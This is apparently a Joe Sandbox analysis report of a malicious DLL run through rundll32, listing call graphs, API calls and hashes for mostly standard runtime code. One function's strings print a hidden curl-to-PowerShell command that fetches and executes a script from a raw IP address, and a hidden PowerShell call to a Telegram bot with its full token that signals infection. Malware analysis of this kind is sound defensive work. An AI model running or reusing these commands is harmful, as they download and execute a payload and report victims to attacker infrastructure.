___vcrt_uninitialize_ptd 6 API calls 9448 6f951f2b 9447->9448 9448->9024 9452 6f956838 9449->9452 9453 6f956842 9452->9453 9455 6f952406 9452->9455 9456 6f959378 9453->9456 9455->9447 9457 6f9591f8 _unexpected 5 API calls 9456->9457 9458 6f959394 9457->9458 9459 6f95939d 9458->9459 9460 6f9593af TlsFree 9458->9460 9459->9455 10039 6f9568cb 10042 6f956852 10039->10042 10043 6f95685e CallCatchBlock 10042->10043 10050 6f956933 EnterCriticalSection 10043->10050 10045 6f956868 10046 6f956896 10045->10046 10048 6f95a4ba ___scrt_uninitialize_crt 14 API calls 10045->10048 10051 6f9568b4 10046->10051 10048->10045 10050->10045 10054 6f95697b LeaveCriticalSection 10051->10054 10053 6f9568a2 10054->10053 10264 6f959ee4 10265 6f959e13 ___scrt_uninitialize_crt 68 API calls 10264->10265 10266 6f959eec 10265->10266 10274 6f95c8c5 10266->10274 10268 6f959ef1 10284 6f95c970 10268->10284 10271 6f959f1b 10272 6f956a8e __freea 14 API calls 10271->10272 10273 6f959f26 10272->10273 10275 6f95c8d1 CallCatchBlock 10274->10275 10288 6f956933 EnterCriticalSection 10275->10288 10277 6f95c948 10295 6f95c967 10277->10295 10278 6f95c8dc 10278->10277 10280 6f95c91c DeleteCriticalSection 10278->10280 10289 6f95d210 10278->10289 10283 6f956a8e __freea 14 API calls 10280->10283 10283->10278 10285 6f95c987 10284->10285 10286 6f959f00 DeleteCriticalSection 10284->10286 10285->10286 10287 6f956a8e __freea 14 API calls 10285->10287 10286->10268 10286->10271 10287->10286 10288->10278 10290 6f95d223 _Allocate 10289->10290 10298 6f95d0eb 10290->10298 10292 6f95d22f 10293 6f954c8c _Allocate 39 API calls 10292->10293 10294 6f95d23b 10293->10294 10294->10278 10383 6f95697b LeaveCriticalSection 10295->10383 10297 6f95c954 10297->10268 10299 6f95d0f7 CallCatchBlock 10298->10299 10300 6f95d124 10299->10300 10301 6f95d101 10299->10301 10308 6f95d11c 10300->10308 10309 6f959f30 EnterCriticalSection 10300->10309 10302 6f954ed3 _Allocate 29 API calls 10301->10302 10302->10308 10304 6f95d142 10310 6f95d182 10304->10310 10306 6f95d14f 10324 6f95d17a 10306->10324 10308->10292 10309->10304 10311 6f95d1b2 10310->10311 10312 6f95d18f 10310->10312 10314 6f959d45 ___scrt_uninitialize_crt 64 API calls 10311->10314 10322 6f95d1aa 10311->10322 10313 6f954ed3 _Allocate 29 API calls 10312->10313 10313->10322 10315 6f95d1ca 10314->10315 10316 6f95c970 14 API calls 10315->10316 10317 6f95d1d2 10316->10317 10318 6f95a149 ___scrt_uninitialize_crt 39 API calls 10317->10318 10319 6f95d1de 10318->10319 10327 6f95d9fc 10319->10327 10322->10306 10323 6f956a8e __freea 14 API calls 10323->10322 10382 6f959f44 LeaveCriticalSection 10324->10382 10326 6f95d180 10326->10308 10329 6f95da25 10327->10329 10330 6f95d1e5 10327->10330 10328 6f95da74 10331 6f954ed3 _Allocate 29 API calls 10328->10331 10329->10328 10332 6f95da4c 10329->10332 10330->10322 10330->10323 10331->10330 10334 6f95d96b 10332->10334 10335 6f95d977 CallCatchBlock 10334->10335 10342 6f95bb96 EnterCriticalSection 10335->10342 10337 6f95d985 10338 6f95d9b6 10337->10338 10343 6f95da9f 10337->10343 10356 6f95d9f0 10338->10356 10342->10337 10359 6f95bc6d 10343->10359 10345 6f95dab5 10372 6f95bbdc 10345->10372 10347 6f95daaf 10347->10345 10349 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10347->10349 10355 6f95dae7 10347->10355 10348 6f95db0d ___scrt_uninitialize_crt 10348->10338 10352 6f95dade 10349->10352 10350 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10351 6f95daf3 CloseHandle 10350->10351 10351->10345 10353 6f95daff GetLastError 10351->10353 10354 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10352->10354 10353->10345 10354->10355 10355->10345 10355->10350 10381 6f95bbb9 LeaveCriticalSection 10356->10381 10358 6f95d9d9 10358->10330 10360 6f95bc8f 10359->10360 10361 6f95bc7a 10359->10361 10363 6f956a68 __dosmaperr 14 API calls 10360->10363 10367 6f95bcb4 10360->10367 10362 6f956a68 __dosmaperr 14 API calls 10361->10362 10364 6f95bc7f 10362->10364 10365 6f95bcbf 10363->10365 10366 6f956a7b __dosmaperr 14 API calls 10364->10366 10368 6f956a7b __dosmaperr 14 API calls 10365->10368 10369 6f95bc87 10366->10369 10367->10347 10370 6f95bcc7 10368->10370 10369->10347 10371 6f954f50 ___std_exception_copy 39 API calls 10370->10371 10371->10369 10373 6f95bc52 10372->10373 10374 6f95bbeb 10372->10374 10375 6f956a7b __dosmaperr 14 API calls 10373->10375 10374->10373 10380 6f95bc15 10374->10380 10376 6f95bc57 10375->10376 10377 6f956a68 __dosmaperr 14 API calls 10376->10377 10378 6f95bc42 10377->10378 10378->10348 10379 6f95bc3c SetStdHandle 10379->10378 10380->10378 10380->10379 10381->10358 10382->10326 10383->10297 9461 6f95206a 9462 6f952073 9461->9462 9463 6f952078 9461->9463 9478 6f95223b 9462->9478 9467 6f951f34 9463->9467 9468 6f951f40 CallCatchBlock 9467->9468 9469 6f951f69 dllmain_raw 9468->9469 9474 6f951f64 __DllMainCRTStartup@12 9468->9474 9475 6f951f4f 9468->9475 9470 6f951f83 dllmain_crt_dispatch 9469->9470 9469->9475 9470->9474 9470->9475 9471 6f951fd5 9472 6f951fde dllmain_crt_dispatch 9471->9472 9471->9475 9473 6f951ff1 dllmain_raw 9472->9473 9472->9475 9473->9475 9474->9471 9476 6f951e84 __DllMainCRTStartup@12 86 API calls 9474->9476 9477 6f951fca dllmain_raw 9476->9477 9477->9471 9479 6f952251 9478->9479 9481 6f95225a 9479->9481 9482 6f9521ee GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9479->9482 9481->9463 9482->9481

                                                                                                Executed Functions

                                                                                                Function 6F956EAB Relevance: 16.7, APIs: 11, Instructions: 188synchronizationCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 6f956eab-6f956eb7 1 6f956ece-6f956ed2 0->1 2 6f956eb9-6f956ecd call 6f956a7b call 6f954f50 0->2 1->2 3 6f956ed4-6f956ed8 1->3 5 6f956ee4-6f956f09 call 6f95ae09 3->5 6 6f956eda-6f956ee2 call 6f956a68 3->6 14 6f956f22-6f956f42 call 6f9571ed 5->14 15 6f956f0b-6f956f20 call 6f956a8e * 2 5->15 6->2 21 6f956f44-6f956f62 call 6f956a8e * 3 14->21 22 6f956f6c-6f956f73 14->22 29 6f956f65-6f956f67 15->29 21->29 24 6f956f75-6f956f77 22->24 25 6f956f78-6f956fc8 call 6f956a68 call 6f9533d0 call 6f95ae14 22->25 24->25 40 6f957014-6f957023 GetLastError call 6f956a21 25->40 41 6f956fca-6f956fd0 25->41 31 6f9570ab-6f9570ae 29->31 51 6f957025-6f957026 CloseHandle 40->51 52 6f95702c-6f95702e 40->52 42 6f956fd6-6f956fd8 41->42 43 6f9570af-6f9570b6 call 6f95535e 41->43 45 6f957039-6f95703c 42->45 46 6f956fda-6f956ff1 WaitForSingleObject GetExitCodeProcess 42->46 53 6f95703e-6f957040 45->53 54 6f95707a-6f95707c 45->54 46->40 49 6f956ff3-6f956ffb 46->49 57 6f957004-6f957006 49->57 58 6f956ffd-6f956ffe CloseHandle 49->58 51->52 61 6f957056-6f957078 call 6f956a8e * 3 52->61 62 6f957030-6f957037 CloseHandle 52->62 55 6f957042-6f957043 CloseHandle 53->55 56 6f957049-6f95704b 53->56 59 6f957085-6f9570a5 call 6f956a8e * 3 54->59 60 6f95707e-6f95707f CloseHandle 54->60 55->56 63 6f957054 56->63 64 6f95704d-6f95704e CloseHandle 56->64 66 6f95700f-6f957012 57->66 67 6f957008-6f957009 CloseHandle 57->67 58->57 79 6f9570a7-6f9570aa 59->79 60->59 61->79 62->61 63->61 64->63 66->61 67->66 79->31
                                                                                                APIs
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FDC
                                                                                                • GetExitCodeProcess.KERNELBASE(?,?), ref: 6F956FE9
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FFE
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957009
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957014
                                                                                                • __dosmaperr.LIBCMT ref: 6F95701B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957026
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957031
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957043
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95704E
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95707F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2764183375-0
                                                                                                • Opcode ID: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction ID: a321e98985f0f9d9a18d7ef8a04501a5f8a3b317096c4e47111c4bc96319f699
                                                                                                • Opcode Fuzzy Hash: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction Fuzzy Hash: 49515B7190020CEBEF12DFA4C984AEE7BB9EF46315F108166E910A61D1D731DA78DF62
                                                                                                Function 6F951E84 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951ECB
                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6F951EE5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                • String ID:
                                                                                                • API String ID: 2442719207-0
                                                                                                • Opcode ID: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction ID: e2276723bfa995d3542d43ed16c1eda4113e27017016161c2d1841421cb4f0a4
                                                                                                • Opcode Fuzzy Hash: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction Fuzzy Hash: 4D41D672D05715AFDB21CF69CC40BAE3AB9EF967A4F10411AE8146B2D1D730DDA1CBA0
                                                                                                Function 6F95912D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 130 6f95912d-6f959139 131 6f9591cb-6f9591ce 130->131 132 6f9591d4 131->132 133 6f95913e-6f95914f 131->133 134 6f9591d6-6f9591da 132->134 135 6f959151-6f959154 133->135 136 6f95915c-6f959175 LoadLibraryExW 133->136 137 6f9591f4-6f9591f6 135->137 138 6f95915a 135->138 139 6f959177-6f959180 GetLastError 136->139 140 6f9591db-6f9591eb 136->140 137->134 144 6f9591c8 138->144 141 6f959182-6f959194 call 6f9561c3 139->141 142 6f9591b9-6f9591c6 139->142 140->137 143 6f9591ed-6f9591ee FreeLibrary 140->143 141->142 147 6f959196-6f9591a8 call 6f9561c3 141->147 142->144 143->137 144->131 147->142 150 6f9591aa-6f9591b7 LoadLibraryExW 147->150 150->140 150->142
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,44818074,?,6F95923C,00000000,6F9510C9,00000000,00000000), ref: 6F9591EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3664257935-537541572
                                                                                                • Opcode ID: f554dc15ddbba9cf125c6ce60cf5df5e1b206662ab8630a6768cee15615cc257
                                                                                                • Instruction ID: 1ede92d87e88183e7490bbb336172c1a1857d4a00e499d7b6d6ec4c2ecc552f4
                                                                                                • Opcode Fuzzy Hash: f554dc15ddbba9cf125c6ce60cf5df5e1b206662ab8630a6768cee15615cc257
                                                                                                • Instruction Fuzzy Hash: E821EB71909621ABFF31CB348D88A9A376D9F437B4F110615ED16A72C8D730F921CAE0
                                                                                                Function 6F956CB6 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 208COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 151 6f956cb6-6f956cc3 152 6f956cc5-6f956cd8 call 6f956a7b call 6f954f50 151->152 153 6f956cdd-6f956ce0 151->153 162 6f956e6a-6f956e6c 152->162 153->152 155 6f956ce2-6f956ce7 153->155 155->152 157 6f956ce9-6f956ced 155->157 157->152 159 6f956cef-6f956cf2 157->159 159->152 161 6f956cf4-6f956d0f call 6f95f610 * 2 159->161 167 6f956d11-6f956d13 161->167 168 6f956d82-6f956d84 161->168 169 6f956d15-6f956d23 call 6f95f610 167->169 170 6f956d8c-6f956da0 call 6f95f610 167->170 171 6f956d86-6f956d88 168->171 172 6f956d8a 168->172 169->170 177 6f956d25-6f956d27 169->177 178 6f956da2-6f956dae call 6f9577f8 170->178 179 6f956dcd-6f956dcf 170->179 171->170 171->172 172->170 180 6f956d2a-6f956d2f 177->180 188 6f956db4-6f956dbe call 6f956eab 178->188 189 6f956e5e 178->189 182 6f956dd2-6f956dd7 179->182 180->180 184 6f956d31-6f956d44 call 6f9578b8 180->184 182->182 183 6f956dd9-6f956def call 6f9578b8 182->183 194 6f956df1-6f956dfb call 6f956a8e 183->194 195 6f956e00-6f956e10 call 6f956040 183->195 196 6f956d46-6f956d47 184->196 197 6f956d4c-6f956d5d call 6f956040 184->197 199 6f956dc3-6f956dc8 188->199 192 6f956e5f-6f956e65 call 6f956a8e 189->192 208 6f956e68-6f956e69 192->208 204 6f956e91-6f956e9a call 6f956a8e 194->204 211 6f956e16-6f956e2a call 6f956a7b 195->211 212 6f956e9c-6f956eaa call 6f954f7d 195->212 196->192 197->212 213 6f956d63-6f956d70 call 6f95a98c 197->213 199->204 204->208 208->162 220 6f956e2d-6f956e3d call 6f956040 211->220 213->212 221 6f956d76-6f956d80 call 6f956a8e 213->221 220->212 226 6f956e3f-6f956e4a call 6f9577f8 220->226 221->170 229 6f956e6d-6f956e8e call 6f956a7b call 6f956eab call 6f956a8e 226->229 230 6f956e4c-6f956e55 226->230 229->204 230->220 231 6f956e57-6f956e5d call 6f956a8e 230->231 231->189
                                                                                                APIs
                                                                                                • _strrchr.LIBCMT ref: 6F956CF9
                                                                                                • _strrchr.LIBCMT ref: 6F956D03
                                                                                                • _strrchr.LIBCMT ref: 6F956D18
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                  • Part of subcall function 6F954F7D: IsProcessorFeaturePresent.KERNEL32(00000017,6F954F4F,?,00000000,00000000,00000000,00000000,?,00000000,?,6F954EC6,?,00000000,00000000,00000000,00000000), ref: 6F954F7F
                                                                                                  • Part of subcall function 6F954F7D: GetCurrentProcess.KERNEL32(C0000417,00000000,?,00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA2
                                                                                                  • Part of subcall function 6F954F7D: TerminateProcess.KERNEL32(00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                                                                • String ID: .com
                                                                                                • API String ID: 3694955208-4200470757
                                                                                                • Opcode ID: 9b357d92cf556d5484546850c74081d810e9dd2059ce5f94eb7f2d74c119b2f5
                                                                                                • Instruction ID: 4c2b800bafc330f446592be22e472aa8b40ae3d784f9c81bcc1d74f6572a7735
                                                                                                • Opcode Fuzzy Hash: 9b357d92cf556d5484546850c74081d810e9dd2059ce5f94eb7f2d74c119b2f5
                                                                                                • Instruction Fuzzy Hash: 07514872504305AAEB16DE74DC44BAF377CDF53768F140929E910AB2C3EB22E938C261
                                                                                                Function 6F951F34 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 240 6f951f34-6f951f45 call 6f952730 243 6f951f47-6f951f4d 240->243 244 6f951f56-6f951f5d 240->244 243->244 247 6f951f4f-6f951f51 243->247 245 6f951f5f-6f951f62 244->245 246 6f951f69-6f951f7d dllmain_raw 244->246 245->246 248 6f951f64-6f951f67 245->248 249 6f952026-6f95202d 246->249 250 6f951f83-6f951f94 dllmain_crt_dispatch 246->250 251 6f95202f-6f95203e 247->251 252 6f951f9a-6f951fac call 6f952286 248->252 249->251 250->249 250->252 255 6f951fd5-6f951fd7 252->255 256 6f951fae-6f951fb0 252->256 258 6f951fde-6f951fef dllmain_crt_dispatch 255->258 259 6f951fd9-6f951fdc 255->259 256->255 257 6f951fb2-6f951fd0 call 6f952286 call 6f951e84 dllmain_raw 256->257 257->255 258->249 260 6f951ff1-6f952023 dllmain_raw 258->260 259->249 259->258 260->249
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 3136044242-0
                                                                                                • Opcode ID: f39c099539444fd164665c3a7531fb4ba72e803a38b6eaf60135d062b150ed0f
                                                                                                • Instruction ID: 12a90bac32d630ebe43dbcbb5dfe6bd070e1fa0829f1c007a7fd4f5244ca9082
                                                                                                • Opcode Fuzzy Hash: f39c099539444fd164665c3a7531fb4ba72e803a38b6eaf60135d062b150ed0f
                                                                                                • Instruction Fuzzy Hash: 04217171D01715ABDB22CF65C840AAF3A7DEB967A4F014116FC146A2D1D730DDA5CBA0
                                                                                                Function 6F951000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                • powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", xrefs: 6F95101D
                                                                                                • cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, xrefs: 6F951010
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: task
                                                                                                • String ID: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -$powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                                • API String ID: 1384045349-2968791885
                                                                                                • Opcode ID: 1ae58ab471330fdb1f05da6f03169599845c29f2ff9a5343fe61446ffa99f7c5
                                                                                                • Instruction ID: b0a6ff7db1b291017c8c5855dc18d32104c4796cba38b27d8e520abd0a3aa384
                                                                                                • Opcode Fuzzy Hash: 1ae58ab471330fdb1f05da6f03169599845c29f2ff9a5343fe61446ffa99f7c5
                                                                                                • Instruction Fuzzy Hash: 56F03070D1030CA7DF44EFA4E9929BE73389F31258F900068B806661E2FF71EA69C691
                                                                                                Function 6F955232 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,6F95522C,00000000,6F954D53,?,?,44818074,6F954D53,?), ref: 6F955243
                                                                                                • TerminateProcess.KERNEL32(00000000,?,6F95522C,00000000,6F954D53,?,?,44818074,6F954D53,?), ref: 6F95524A
                                                                                                • ExitProcess.KERNEL32 ref: 6F95525C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 41b9b31108cba0d11bf0442ceb6e522d1cfa5f4c18075642e3d1fb3e050704f8
                                                                                                • Instruction ID: 56aa2e9e73a434e648341db88ae513337887d601ffda823a7a27e729d01ee67d
                                                                                                • Opcode Fuzzy Hash: 41b9b31108cba0d11bf0442ceb6e522d1cfa5f4c18075642e3d1fb3e050704f8
                                                                                                • Instruction Fuzzy Hash: 73D09E31004604ABEF016F64CC4C9993F2AAF453A97405418B9195A0B6CB75E971DF50
                                                                                                Function 6F951D7D Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951DCA
                                                                                                  • Part of subcall function 6F95228C: InitializeSListHead.KERNEL32(6F967C70,6F951DD4,6F965708,00000010,6F951D65,?,?,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750), ref: 6F952291
                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F951E34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                • String ID:
                                                                                                • API String ID: 3231365870-0
                                                                                                • Opcode ID: f64e6f50f4502f81fd2f06a4c8b2b9356389a74d759160b0416409b9866f7635
                                                                                                • Instruction ID: dbd21dee974c30aa6a56cc72ae674814fda50462661509d0bfe32484781d4195
                                                                                                • Opcode Fuzzy Hash: f64e6f50f4502f81fd2f06a4c8b2b9356389a74d759160b0416409b9866f7635
                                                                                                • Instruction Fuzzy Hash: E12102329483119AFF06EFB8A40079C37A19F6372CF10045AD5842B1D3DF32E5B8C662
                                                                                                Function 6F95AE14 Relevance: 1.6, APIs: 1, Instructions: 89processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 6F95AEC9
                                                                                                Memory Dump Source
